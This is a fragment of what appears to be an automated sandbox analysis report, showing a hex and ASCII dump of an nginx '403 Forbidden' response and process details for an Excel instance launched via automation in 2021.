        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


        Code Manipulations

        Statistics

        System Behavior

        General

        Start time:06:07:45
        Start date:04/05/2021
        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        Wow64 process (32bit):false
        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Imagebase:0x13f330000
        File size:27641504 bytes
        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        Disassembly

        Reset < >